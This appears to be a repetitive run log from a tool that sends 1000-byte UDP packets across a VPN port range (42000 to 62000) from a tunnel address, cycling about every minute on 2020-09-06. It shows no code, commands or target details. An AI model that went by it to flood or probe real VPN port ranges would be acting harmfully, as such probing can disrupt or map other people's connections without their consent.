-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:20:06 -Starting port fill at 2020-09-06 14:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:21:05 -Starting port fill at 2020-09-06 14:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:22:04 -Starting port fill at 2020-09-06 14:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:23:05 -Starting port fill at 2020-09-06 14:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:24:05 -Starting port fill at 2020-09-06 14:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:25:06 -Starting port fill at 2020-09-06 14:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:26:06 -Starting port fill at 2020-09-06 14:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:27:05 -Starting port fill at 2020-09-06 14:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:28:05 -Starting port fill at 2020-09-06 14:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:29:04 -Starting port fill at 2020-09-06 14:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:30:04 -Starting port fill at 2020-09-06 14:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:31:04 -Starting port fill at 2020-09-06 14:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:32:04 -Starting port fill at 2020-09-06 14:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:33:07 -Starting port fill at 2020-09-06 14:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:34:04 -Starting port fill at 2020-09-06 14:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:35:05 -Starting port fill at 2020-09-06 14:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:36:05 -Starting port fill at 2020-09-06 14:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:37:06 -Starting port fill at 2020-09-06 14:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:38:05 -Starting port fill at 2020-09-06 14:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:39:07 -Starting port fill at 2020-09-06 14:40:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:40:05 -Starting port fill at 2020-09-06 14:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:41:05 -Starting port fill at 2020-09-06 14:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:42:04 -Starting port fill at 2020-09-06 14:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 